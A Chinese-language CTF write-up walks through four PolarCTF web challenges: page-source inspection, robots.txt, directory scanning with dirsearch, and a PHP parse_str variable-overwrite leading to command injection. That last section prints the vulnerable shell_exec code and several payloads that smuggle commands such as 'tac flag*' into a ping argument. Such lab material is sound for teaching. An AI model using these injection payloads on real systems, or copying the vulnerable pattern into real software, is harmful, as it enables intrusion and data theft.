polarctf靶场[WEB]Don‘t touch me、机器人、uploader、扫扫看

目录

[[web]Don't touch me](#[web]Don't touch me)

考点:查看源代码、前端

[web]机器人

考点:robot协议

[工具:御剑,kali dirsearch](#工具:御剑,kali dirsearch)

[web]覆盖

考点:@parse_str覆盖

[web]扫扫看

考点:目录扫描

[工具:御剑、kali dirsearch](#工具:御剑、kali dirsearch)


[web]Don't touch me

考点:查看源代码、前端

打开网页,叫我们找flag

我们打开源代码,发现了一个被注释的子域

访问,是另一个界面

在看源代码 ,发现有个3.php,点开

就可以发现了被注释的flag文件,fla.php

访问,得到本题flag

[web]机器人

考点:robot协议

工具:御剑,kali dirsearch

题目说是机器人,所以考虑是robots协议

当robots访问一个网站(比如http://www.abc.com)时,首先会检查该网站中是否存在http://www.abc.com/robots.txt这个文件,如果机器人找到这个文件,它就会根据这个文件的内容,来确定它访问权限的范围。(也就相当于一个管理权限的文件)

robots.txt文件用法举例:

User-agent(搜索引擎robots的名字):*(*代表所有)

Disallow(以Disallow开头的url都禁止访问):/(代表禁止所有引擎访问网站任何部分)

例:

User-agent:baiduspider

Disallow:

User-agent:*

Disallow:/

代表允许baiduspider来访问网站任何,其他都不行

进入robots.txt文件查看一下权限或者被隐藏了哪些,或者不确定访问什么可以用御剑或者kali 的dirsearch工具进行目录扫描

看到了一部分的flag,再看Disallow,应该是个目录

访问/27f5e15b6af3223f1176293cd015771d/flag.php

得到另一部分的flag,拼接一起便可得到flag

[web]覆盖

考点:@parse_str覆盖

php 复制代码
 <?php
error_reporting(0);
if (empty($_GET['id'])) {
    show_source(__FILE__);
    die();
} else {
    include 'flag.php';
    $a = "www.baidu.com";
    $result = "";
    $id = $_GET['id'];
    @parse_str($id);
    echo $a[0];
    if ($a[0] == 'www.polarctf.com') {
        $ip = $_GET['cmd'];
        $result .= shell_exec('ping -c 2 ' . $a[0] . $ip);
        if ($result) {
            echo "<pre>{$result}</pre>";
        }
    } else {
        exit('其实很简单!');
    }
} 

这段代码是一个简单的 PHP 网页应用,主要功能是根据特定条件执行命令并返回结果。如果没有提供 id 参数,就显示当前文件的源代码并终止程序。如果提供了 id 参数,并且通过特定方式将变量 $a 的第一个字符修改为 www.polarctf.com,同时提供 cmd 参数,就会执行 ping 命令并返回结果。

@parse_str($id);:这个函数不会检查变量 id 是否存在,如果通过其他方式传入数据给变量id ,且当前$id中数据存在,它将会直接覆盖掉

$result.= shell_exec('ping -c 2 '. $a[0]. $ip); :使用 shell_exec 函数执行 ping 命令,向 "www.polarctf.com" 和变量 $ip 指定的地址发送两个 ICMP 数据包,并将结果存储在变量 $result 中。

发现a[0]的值确实被更改了,那么接下来就简单了,先构造一个cmd=|ls;,发现回显了flag.php,但是不能直接读取,我们尝试用读取ls的命令,而且cat似乎被覆盖过滤了,所以我们使用tac。

有集中方法进行构造:

php 复制代码
?id=a[0]=www.polarctf.com&cmd=|tac `ls`;//回显之后直接可得到flag
 
?id=a[]=www.polarctf.com&cmd=|ls //发现有flag.php,但是不能直接读取
?id=a[0]=www.polarctf.com&cmd=;tac%20flag*
或?id=a[0]=www.polarctf.com&cmd=;tac%20fl''ag.php
?id=a[0]=www.polarctf.com&cmd=;tac f* //可直接读取flag

得到本题的flag

如果还想练习相同知识点,在相同的靶场也有类似的题目干正则该题的wp:https://blog.csdn.net/m0_73981089/article/details/138520071

[web]扫扫看

考点:目录扫描

工具:御剑、kali dirsearch

网页显示"或许你该扫一扫",所以我们使用御剑或者kali dirsearch工具扫一扫

这里使用kali dirsearch扫

dirsearch -u 网址 -e*

访问该子域,进入此页面

点击查看源代码

得到本题的flag

相关推荐
Winston Wood26 分钟前
Android Parcelable和Serializable的区别与联系
android·序列化
清风徐来辽31 分钟前
Android 项目模型配置管理
android
帅得不敢出门1 小时前
Gradle命令编译Android Studio工程项目并签名
android·ide·android studio·gradlew
我要洋人死1 小时前
导航栏及下拉菜单的实现
前端·css·css3
科技探秘人1 小时前
Chrome与火狐哪个浏览器的隐私追踪功能更好
前端·chrome
科技探秘人1 小时前
Chrome与傲游浏览器性能与功能的深度对比
前端·chrome
JerryXZR1 小时前
前端开发中ES6的技术细节二
前端·javascript·es6
七星静香1 小时前
laravel chunkById 分块查询 使用时的问题
java·前端·laravel
q2498596931 小时前
前端预览word、excel、ppt
前端·word·excel
小华同学ai2 小时前
wflow-web:开源啦 ,高仿钉钉、飞书、企业微信的审批流程设计器,轻松打造属于你的工作流设计器
前端·钉钉·飞书